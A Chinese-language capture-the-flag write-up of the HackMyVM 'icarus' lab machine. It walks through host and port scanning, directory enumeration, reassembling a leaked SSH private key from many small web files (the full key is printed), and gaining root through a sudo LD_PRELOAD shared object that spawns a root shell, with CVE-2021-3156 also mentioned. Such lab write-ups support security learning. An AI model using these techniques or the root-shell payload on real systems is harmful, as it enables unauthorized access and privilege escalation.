当前位置: 首页 > news >正文

【打靶日记】HackMyVm 之 icarus

news 2026/6/28 10:07:52

主机发现

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# arp-scan -I eth1 -l192.168.56.146 08:00:27:d5:6a:34 PCS Systemtechnik GmbH

主机地址为:192.168.56.146

端口扫描

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# nmap -p- 192.168.56.146PORT STATE SERVICE22/tcpopenssh80/tcpopenhttp

80端口探测

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146<!doctype html><htmllang="en"><title>LOGIN</title><formclass="form-signin"action="check.php"method="post"><inputtype="text"autocomplete="off"id="user"name="user"name="user"placeholder="Username"required autofocus><inputtype="password"name="password"id="password"placeholder="Password"required><inputtype="submit"value="Sign in"></form></body></html>

一个表单登录

目录枚举

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# dirsearch -u http://192.168.56.146[00:51:36]Starting:[00:51:41]200- 9KB - /a[00:51:51]200- 21B - /check.php[00:52:02]302- 0B - /login.php ->index.php[00:52:23]200- 1B - /xml Task Completed

收集泄露信息

访问

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/aa xaa xab(....)xzbta xzbtb xzbtc ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/check.phpMan, youmakeme cry. ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xmlK

随便测试几个,发现有返回结果

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xaa- ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xab- ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/xzabcO

获取id_rsa

#获取数据,清洗第一行的a,获取id_rsa┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# curl 192.168.56.146/a > dir.txt% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed10096411009641001752k0--:--:-- --:--:-- --:--:-- 1883k ┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# cat dir.txt| wc -l1825┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# tail -1823 dir.txt > dir2.txt┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# for i in $(cat dir2.txt);do curl 192.168.56.146/$i >> id; done

查看id文件

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# cat id-----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn NhAAAAAwEAAQAAAQEA5xagxLiN5ObhPjNcs2I2ckcYrErKaunOwm40kTBnJ6vrbdRYHteS afNWC6xFFzwO77+Kze229eK4ddZcwmU0IdN02Y8nYrxhl8lOc+e5T0Ajz+tRmLGoxJVPsS TzKBERlWpKuJoGO/CEFLOv6PP6s79YYzZFpdUjaczY96jgICftzNZS+VkBXuLjKr79h4Tw z7BK4V6FEQY0hwT8NFfNrF3x3VPe0UstdiUJFl4QV/qAPlHVhPd0YUEPr/95mryjuGi1xw P7xVFrYyjLfPepqYHiS5LZxFewLWhhSjBOI0dzf/TwiNRnVGTZhB3GemgEIQRAam26jkZZ 3BxkrUVckQAAA8jfk7Jp35OyaQAAAAdzc2gtcnNhAAABAQDnFqDEuI3k5uE+M1yzYjZyRx isSspq6c7CbjSRMGcnq+tt1Fge15Jp81YLrEUXPA7vv4rN7bb14rh11lzCZTQh03TZjydi vGGXyU5z57lPQCPP61GYsajElU+xJPMoERGVakq4mgY78IQUs6/o8/qzv1hjNkWl1SNpzN j3qOAgJ+3M1lL5WQFe4uMqvv2HhPDPsErhXoURBjSHBPw0V82sXfHdU97RSy12JQkWXhBX +oA+UdWE93RhQQ+v/3mavKO4aLXHA/vFUWtjKMt896mpgeJLktnEV7AtaGFKME4jR3N/9P CI1GdUZNmEHcZ6aAQhBEBqbbqORlncHGStRVyRAAAAAwEAAQAAAQEAvdjwMU1xfTlUmPY3 VUP9ePsBwSIck6ML8t35H8KFLKln3C4USxpNNe/so+BeTo1PtBVHYpDFu9IMOvrl7+qW3q dLGyUpdUtQXhPK+RvJONt30GwB+BEUlpQYCW9SuHr1WCwfwPMA5iNdT2ijvx0ZvKwZYECJ DYlB87yQDz7VCnRTiQGP2Mqiiwb7vPd/t386Y+cAz1cVl7BnHzWWJTUTkKCwijnvjYrD0o tTQX4sGd6CrI44g+L8hnYuCZz+a0j6IyUfXJqj6l+/Z2Af7pJjbJD3P28xX7eY0h1Cec2l /sb7qg2wy0qJNywJ35l8bZzZKjkXztPLOqMFQ6Fh0BqSdQAAAIEAlaH0ZEzJsZoR3QqcKl xRKjVcuQCwcrKlNbJu2qRuUG812CLb9jJxJxacJPBV0NS832c+hZ3BiLtA5FwCiGlGq5m5 HS3odf3lLXDfIK+pur4OWKBNLDxKbqi4s4M05vR4gHkmotiH9eWlCNuqL46Ip5H1vFXeJM pLRLN0gqOGuQQAAACBAPfffuhidAgUZH/yTvATKC5lcGrE7bkpOq+6XMMgxEQl0Hzry76i rGXkhTY4QUtthYo4+g7jiDzKlbeaS7aN8RYq38GzQnZZQcSdvL1yB/N554gQvzJLvmKQbm gLhMRcdDmifUelJYXib2Mjg/BLaRXaEzOomUKR2nyJH7VgU+xzAAAAgQDuqkBp44indqhx wrzbfeLnzQqpZ/rMZXGcvJUttECRbLRfohUftFE5J0PKuT8w0dpacNCVgkT9A0Tc3xRfky ECBQjeKLvdhcufJhQl0pdXDt1cpebE50LE4yHc8vR6FEjhR4P2AbGICJyRS7AX7UnrOWdUIE3FeNP0r5UiSDq16wAAAA1pY2FydXNAaWNhcnVzAQIDBA==-----END OPENSSH PRIVATE KEY-----

获取用户名

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# chmod 600 id┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# ssh-keygen -y -f idssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnFqDEuI3k5uE+M1yzYjZyRxisSspq6c7CbjSRMGcnq+tt1Fge15Jp81YLrEUXPA7vv4rN7bb14rh11lzCZTQh03TZjydivGGXyU5z57lPQCPP61GYsajElU+xJPMoERGVakq4mgY78IQUs6/o8/qzv1hjNkWl1SNpzNj3qOAgJ+3M1lL5WQFe4uMqvv2HhPDPsErhXoURBjSHBPw0V82sXfHdU97RSy12JQkWXhBX+oA+UdWE93RhQQ+v/3mavKO4aLXHA/vFUWtjKMt896mpgeJLktnEV7AtaGFKME4jR3N/9PCI1GdUZNmEHcZ6aAQhBEBqbbqORlncHGStRVyR icarus@icarus

登录icarus

┌──(root㉿xhh)-[~/Desktop/xhh/HMV/icarus]└─# ssh icarus@192.168.56.146 -i idicarus@icarus:~$iduid=1000(icarus)gid=1000(icarus)groups=1000(icarus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

成功获得icarus用户权限

user.txt

icarus@icarus:~$catuser.txt Dontgotothesun

提权

icarus@icarus:~$sudo-l Matching Defaults entriesforicarus on icarus: env_reset, mail_badpass,env_keep+=LD_PRELOAD,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User icarus may run the following commands on icarus:(ALL:ALL)NOPASSWD: /usr/bin/id

其中有"env_keep+=LD_PRELOAD"

┌──(root㉿xhh)-[~/Desktop/some/setenv] └─# cat pe.c #include<stdio.h> #include<sys/types.h> #include<stdlib.h> #include<unistd.h> void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); }

编译好pe.so文件

icarus@icarus:~$lsflag.sh pe.so user.txt icarus@icarus:~$sudoLD_PRELOAD=./pe.soidroot@icarus:/home/icarus# iduid=0(root)gid=0(root)groups=0(root)

成功获得root用户权限

其中,sudo的版本为“Sudo version 1.8.27”,靶机版本sudo过低,存在CVE-2021-3156

root.txt

root@icarus:~# cat root.txtRIPicarus
http://www.cnnetsun.cn/news/74948.html

相关文章:

  • Snakemake中的样本配对与文件处理
  • 工业防水平板电脑WPPC-H1520T(P)在食品加工湿环境中的部署与应用开发实践
  • 探索数字组合的艺术
  • Shiny模块化开发:解决Tab选中问题
  • AutoGPT与SQLite轻量数据库集成:适用于小型项目的本地存储方案
  • Jenkins Pipeline调用LLama-Factory训练任务,实现无人值守AI训练
  • 中小学教育AI工具开发:架构师的数据主权方案
  • 如何快速上手 Harepacker-resurrected:从入门到精通的完整指南
  • 百万 Token 也能无损压缩?C3 模型用“级联压缩”重新定义长上下文挑战
  • GOBI 2025 全球开源商业创新大会顶级嘉宾阵容公开!4 大 Panel 火力全开
  • 安卓私密文件同步终极方案:Syncthing-Android完全指南
  • AutoClicker鼠标自动化工具:新手完全指南与实战技巧
  • 鸿蒙原子化服务新玩法:Flutter也能开发高性能Service卡片
  • 8 个 MBA 毕业答辩 PPT 工具,AI 格式优化推荐
  • 如何快速实现STL转STEP:面向3D设计新手的完整指南
  • 图神经网络:欺诈检测与蛋白质功能预测
  • ComfyUI与Mosquitto MQTT代理集成:物联网场景适配
  • 7、脚本编程中的代码片段与替代语法技巧
  • 15、使用 AWK 总结日志
  • ComfyUI插件生态盘点:提升效率的必备扩展推荐
  • 程序员爆哭!我们让 COCO AI 接管 GitLab 审查后,团队直接起飞:连 CTO 都说“这玩意儿比人靠谱多了
  • 交通信号仿真软件:Synchro_(14).Synchro与其他软件的集成
  • 交通信号仿真软件:Vistro_(1).Vistro软件介绍
  • 交通信号仿真软件:Vistro_(4).交通网络建模
  • 微软将影响在线服务的第三方漏洞纳入奖励计划
  • 42、Linux 图形界面与邮件服务器配置全解析
  • 47、Linux系统安全防护全解析
  • 48、Linux系统安全:PAM、文件权限与网络防护
  • Blender贝塞尔曲线终极指南:用Bezier Utilities插件快速掌握曲线编辑技巧
  • 3步轻松制作Windows 11精简版:让老旧电脑焕发新生